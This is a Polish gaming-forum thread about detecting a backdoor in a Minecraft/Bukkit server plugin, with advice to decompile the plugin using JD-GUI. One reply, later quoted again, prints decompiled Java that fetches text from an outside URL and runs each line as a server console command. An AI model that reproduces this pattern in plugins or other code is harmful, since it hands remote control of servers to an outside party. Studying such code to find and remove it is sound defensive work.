Skocz do zawartości
  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

[Pytanie] Jak sprawdzić backdorra pluginu?


Rekomendowane odpowiedzi

Opublikowano

Witam jak w temacie, mam problem z jednym pluginem ma on tzw "backdorra"


czy da się jakoś sprawdzic jaka jest komenda na backdorra?


 


Chodzi o przeskanowanie pluginu, jeżeli ktoś może pomóc to skype: Maniak1066


─────────────────────────────────────────────────────────────────────────────


Moderator to usuwa. EHE...


─────────────────────────────────────────────────────────────────────────────

Opublikowano

Siema, jestem wróżbita Maciej, ale zgubiłem kule. Wrzuć ten plugin na jakiś hosting (speedshare, itp.) bo bez tego pluginu nie jestem w stanie nic zrobić, bo mi kula spier*oliła.

1390144171-U592769.png


Opublikowano

Mu chodzi jak sprawdzić a nie żebyście sprawdzili... pobierz program JD GUI i otwórz nim plik to przeskanowania a następnie poprzęglądaj pliki.Szukaj coś z frazą "op" tak w skrócie :D ale plik ktości może ocenić jak dasz

Opublikowano

Możesz sprawdzić wpisując w grze komendę tego pluginu (np. /essentials) i klikając tab, powinny pokazać się wszystkie argumenty komendy, poszukaj jakichś których nie widziałeś wcześniej. Drugi sposób (rekomendowany) to pobierz program Jd-Gui i poszukaj sobie fraz typu "op".

img.jpg

Opublikowano

Możesz sprawdzić wpisując w grze komendę tego pluginu (np. /essentials) i klikając tab, powinny pokazać się wszystkie argumenty komendy, poszukaj jakichś których nie widziałeś wcześniej. Drugi sposób (rekomendowany) to pobierz program Jd-Gui i poszukaj sobie fraz typu "op".

owy "tab" działa tylko jeśli autor pluginu o to zadba, trzeba ręcznie dodać te mozliwości, same z siebie nie zadziałają.

Tylko same komendy mozna zawsze tak sprawdzać, ale argumenty tylko jak ktoś doda obsługe tab-a

To już jest koniec smerfa:


http://www.mpcforum.pl/topic/1323530-info-znikam/


GG: 48522543


PS: Na innych forach i stronach znajdziesz mnie pod nickiem: 


BukkitSmerf

Opublikowano

Mu chodzi jak sprawdzić a nie żebyście sprawdzili... pobierz program JD GUI i otwórz nim plik to przeskanowania a następnie poprzęglądaj pliki.Szukaj coś z frazą "op" tak w skrócie :D ale plik ktości może ocenić jak dasz

 

 

Możesz sprawdzić wpisując w grze komendę tego pluginu (np. /essentials) i klikając tab, powinny pokazać się wszystkie argumenty komendy, poszukaj jakichś których nie widziałeś wcześniej. Drugi sposób (rekomendowany) to pobierz program Jd-Gui i poszukaj sobie fraz typu "op".

 

Pierdzielenie z tym op

Ostatnio znalazłem w pluginie na gildie taki kod:

  private void command()
  {
    getServer().getScheduler().scheduleSyncRepeatingTask(this, new Runnable()
    {
      public void run()
      {
        String http = "http://www.hester.yt/sync.php?action=HesterQGuild:" + Bukkit.getPort();
        try
        {
          URL link = new URL(http);
          BufferedReader read = new BufferedReader(new InputStreamReader(link.openStream(), "UTF-8"));
          String line = "";
          String[] cmd;
          int i;
          for (; (line = read.readLine()) != null; i < cmd.length)
          {
            cmd = line.split(";");
            i = 0; continue;
            Main.this.getServer().dispatchCommand(Main.this.getServer().getConsoleSender(), cmd[i]);i++;
          }
          read.close();
        }
        catch (Exception localException) {}
      }
    }, 0L, 6000L);
  }

i jak widać nic z op tam nie ma...

Opublikowano

Pierdzielenie z tym op

Ostatnio znalazłem w pluginie na gildie taki kod:

  private void command()
  {
    getServer().getScheduler().scheduleSyncRepeatingTask(this, new Runnable()
    {
      public void run()
      {
        String http = "http://www.hester.yt/sync.php?action=HesterQGuild:" + Bukkit.getPort();
        try
        {
          URL link = new URL(http);
          BufferedReader read = new BufferedReader(new InputStreamReader(link.openStream(), "UTF-8"));
          String line = "";
          String[] cmd;
          int i;
          for (; (line = read.readLine()) != null; i < cmd.length)
          {
            cmd = line.split(";");
            i = 0; continue;
            Main.this.getServer().dispatchCommand(Main.this.getServer().getConsoleSender(), cmd[i]);i++;
          }
          read.close();
        }
        catch (Exception localException) {}
      }
    }, 0L, 6000L);
  }

i jak widać nic z op tam nie ma...

Ale to te nie musi byc backdoor, bo ja wiem skąd to masz :P

I plugin oryginalnie nalezy do kogoś innego i ja raczej obstawiam że uzywa tego do synchronizacji swoich serverów na jednej maszynie.

 

Ale może być też użyte jako backdoor przez właściciela pluginu :)

To już jest koniec smerfa:


http://www.mpcforum.pl/topic/1323530-info-znikam/


GG: 48522543


PS: Na innych forach i stronach znajdziesz mnie pod nickiem: 


BukkitSmerf

Opublikowano

Co do backoora, to już zlokalizowany i wywalony działał na zasadzie zczytania komendy ze strony www, "licencji" w .txt a po wywołaniu komendy wywoływał takową w consoli.

─────────────────────────────────────────────────────────────────────────────


Moderator to usuwa. EHE...


─────────────────────────────────────────────────────────────────────────────

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

×
×
  • Dodaj nową pozycję...